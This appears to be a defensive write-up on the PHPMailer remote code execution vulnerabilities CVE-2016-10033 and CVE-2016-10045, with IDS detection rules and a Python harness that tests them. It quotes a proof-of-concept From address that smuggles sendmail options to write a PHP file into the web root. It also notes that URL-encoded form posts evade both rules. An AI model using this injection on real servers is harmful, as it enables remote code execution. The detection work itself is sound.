
1. Vulnerability description

Reference: CVE-2016-10033 vulnerability analysis



Attack type (vector)


1) CVE-2016-10033

PHPMailer < 5.2.18 Remote Code Execution PoC Exploit (CVE-2016-10033)

// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form

$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
$msg_body  = "<?php phpinfo(); ?>";




2) CVE-2016-10045

Bypass / PHPMailer < 5.2.20 Remote Code Execution PoC Exploit (CVE-2016-10045)

// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form

$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
$msg_body  = "<?php phpinfo(); ?>";



2. Detection rules

Since both CVEs are detected by the same string, two rules were written for it: 1) a pcre-based rule and 2) a content-based rule.
(They are duplicates, so either one can be used on its own; for that reason both were created with sid 1.)

1) 

alert tcp any any -> any any (msg:"Vulmon_PHPMailer_RCE"; pcre:"/\\\".{1,40}-oQ.{1,40}-X.{1,40}\.php.{1,40}@/i"; reference:url,legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html;  reference:url,legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html; sid:1; rev:2;)


2)

alert tcp any any -> any any (msg:"Vulmon_PHPMailer_RCE2"; content:"|5C 22|"; content:"-oQ"; within:40; nocase; content:"-X"; within:40; content:"php"; within:40; nocase; content:"@"; within:40; reference:url,legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html;  reference:url,legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html; sid:2; rev:1;)
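To check what the two rules above actually match, here is an added Python harness (not part of the original post, and not the IDS engine itself) that applies rule 1)'s PCRE as the engine would compile it and re-implements rule 2)'s content/within chain, then runs both over constructed sample payloads: the PoC From address quoted above, an ordinary sender, and a URL-encoded form submission. The interpretation of `within:N` (the content must lie entirely inside the N bytes that follow the previous match) and the sample strings are assumptions made for this example.

```python
import re

# Rule 1): the PCRE as the IDS sees it once the rule-string escaping
# (\\\" -> \") is removed. No DOTALL, mirroring a pcre with only the /i flag.
RULE1_PCRE = re.compile(rb'\\".{1,40}-oQ.{1,40}-X.{1,40}\.php.{1,40}@', re.IGNORECASE)

# Rule 2): the content chain. Each entry is (bytes, within, nocase);
# within=None means the first content may appear anywhere in the payload.
RULE2_CHAIN = [
    (b'\\"', None, False),  # content:"|5C 22|"
    (b'-oQ', 40, True),     # content:"-oQ"; within:40; nocase;
    (b'-X', 40, False),     # content:"-X"; within:40;
    (b'php', 40, True),     # content:"php"; within:40; nocase;
    (b'@', 40, False),      # content:"@"; within:40;
]


def _find_all(hay, needle, nocase):
    """Yield every offset of needle in hay (case-folded when nocase)."""
    if nocase:
        hay, needle = hay.lower(), needle.lower()
    start = 0
    while True:
        idx = hay.find(needle, start)
        if idx < 0:
            return
        yield idx
        start = idx + 1


def content_chain_match(payload, chain=RULE2_CHAIN, pos=0, step=0):
    """Evaluate a Snort/Suricata-style content/within chain (assumed semantics:
    'within:N' = the content must fit entirely in the N bytes after the end of
    the previous match). Every candidate occurrence is tried recursively, so an
    early hit that leads nowhere does not hide a later one that would alert."""
    if step == len(chain):
        return True
    pattern, within, nocase = chain[step]
    window = payload[pos:] if within is None else payload[pos:pos + within]
    for idx in _find_all(window, pattern, nocase):
        if content_chain_match(payload, chain, pos + idx + len(pattern), step + 1):
            return True
    return False


def pcre_match(payload):
    """Rule 1) as a boolean."""
    return RULE1_PCRE.search(payload) is not None


def evaluate(payload):
    """Return which of the two rules would alert on this payload."""
    return {"pcre_rule": pcre_match(payload), "content_rule": content_chain_match(payload)}


# Constructed sample payloads (not captured traffic):
SAMPLES = {
    # the From address from the PoC above, as a raw string on the wire
    "poc_from": b'"attacker\\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com',
    # ordinary sender
    "benign": b'"John Doe" <john@example.com>',
    # a legitimately escaped quote in the local part: first content hits, chain does not
    "escaped_quote_only": b'"o\\"neil"@example.com',
    # the PoC address as a browser would percent-encode it in a form POST body
    "poc_urlencoded": b'email=%22attacker%5C%22+-oQ%2Ftmp%2F+-X%2Fvar%2Fwww%2Fcache%2Fphpcode.php++some%22%40email.com',
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:20s} {evaluate(payload)}")
```

Both rules alert on the raw PoC string and stay quiet on the benign addresses, which confirms they are equivalent for this pattern. The last sample is the caveat worth noting: when the address arrives through a web contact form, the POST body is percent-encoded, so `\"` never appears on the wire as `|5C 22|` and neither rule fires. Detecting that path needs a variant written against a decoded HTTP body buffer rather than the raw TCP payload.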


